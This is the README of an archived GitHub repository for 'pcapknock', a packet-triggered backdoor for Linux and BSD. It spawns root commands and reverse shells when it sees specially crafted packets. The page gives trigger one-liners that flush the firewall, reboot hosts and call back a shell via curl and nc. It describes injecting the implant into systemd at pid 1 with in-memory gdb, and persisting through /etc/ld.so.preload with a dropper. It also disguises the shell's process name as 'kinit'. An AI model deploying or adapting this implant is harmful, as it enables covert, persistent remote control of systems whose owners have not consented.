Skip to content
This repository has been archived by the owner on Apr 7, 2024. It is now read-only.
/ pcapknock Public archive

Watches for trigger packets, runs commands or spawns a shell

License

Notifications You must be signed in to change notification settings

magisterquis/pcapknock

Repository files navigation

PcapKnock

PcapKnock listens for specially-crafted packets and either runs a command or spawns a reverse shell based on the contents of the packets. It is meant for use as a PoC; there is no encryption or authentication. It can either be built as a standalone binary or an injectable library.

Tested on:

  • OpenBSD
  • FreeBSD (GhostOS)
  • Linux (CentOS, Ubuntu)
  • LXC on Centos (Debian)

For legal use only.

Building

The build.sh script will try to produce binaries and shared object files, but may well need tweaking. On Linux, expect to have to wrestle your distro's package manager. On OpenBSD and FreeBSD, it just works.

The library and binaries will go into built/$(uname -s) in the source tree. The built files are as follows:

Name Purpose
pcapknock.standalone "Normal" standalone binary. Nohup it and run it in in the backgroud.
pcapknock.standalone.daemon Standalone binary which forks itself into the background.
pcapknock.standalone.debug Standalone binary which prints debugging info.
pcapknock.so Injectable library
pcapknock.injector Injects pcapknocks.so into a process with in-memory GDB
pcapknock.systemd.so Systemd-specific preloadable library
systemd_dropper.sh Dropper which preloads vi pcapknock.systemd.so via /etc/ld.so.preload

Usage

Once pcapknock is running as root, all that's required to trigger it is a packet containing either a command to run surrounded by COMMAND...COMMAND or an address to which to call back with a shell surrounded with CALLBACK...CALLBACK.

Trigger examples:

# Drop the Linux firewall
echo 'iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -F' | nc -u <TARGET> 53

# Reboot a box
dig @target COMMANDrebootCOMMAND

# Call back on port 80
(sleep 1 && curl -sv -d 'CALLBACK<LOCALIP>:80CALLBACK' http://target) & nc -nvl 80

For either a callback or a command, a shell is spawned, disassociated from the parent process, and run with the name (i.e. argv[0]) kinit. The name may be changed in config.h.

Configuration

Three compile-time preprocessor macros may be set when building to control aspects of pcapknock's behavior.

Macro Effect
DEBUG Prints helpful debugging messages
DAEMON Causes the standalone binary builds to disassociate from the controlling terminal (What you probably want)
PRELOADSYSTEMD Buid a library suitable for injection into systemd via /etc/ld.so.preload.

The compiled binaries and shared object files will have the above appended to their names.

Further compile-time configuration can be performed by editing config.h, but in general, this shouldn't be necessary.

There is no runtime configuration.

Linux Injection

On Linux, an few additional files are built for injecting into systemd either on a running system or on boot vi /etc/ld.so.preload.

Live Injection

The program pcapknock.injector loads pcapknock.so and gdb into memory and uses gdb to shove pcapknock into another process which may be specified as the first command-line argument, e.g. ./pcapknock.injector 23. Not specifying a number or specifying an invalid number (like ./pcapknock.injector kittes) will inject into pid 1. Turns out it works pretty well.

The injectee process should be have libdl loaded into it as well as have permissions to sniff packets (e.g. open a packet socket). Try a trigger before getting rid of the access used to run pcapknock.injector. COMMANDtouch /tmpCOMMAND works pretty well for testing.

When injecting there should be a line something like

$1 = (void *) 0x559ea705d3f0

which indicates (likely) success. If the number on the right is 0, something's gone wrong.

If injecting into init (which is the default if no pid is given) expect a lot of lines in dmesg and to the console similar to the following:

kernel:systemd[1]: segfault at 7ffff81e3f5f ip 00007ffff81e3f5f sp 00007ffff81e3f50 error 15 

Apparently systemd is happy segfaulting. A "better" description of systemd can be found in https://amzn.com/B075DYXZW1.

Persistent Injection

Using /etc/ld.so.preload, pcapknock can be loaded into systemd from boot by pointing it at pcapknock.systemd.so. The library will also be loaded into every other process, but it only sniffs if it finds itself in the process with pid 1. A convenient dropper, systemd_dropper.sh, will write the library to disk as '/usr/local/sbin/libpk.so.4and add it to/etc/ld.so.preload`.

About

Watches for trigger packets, runs commands or spawns a shell

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published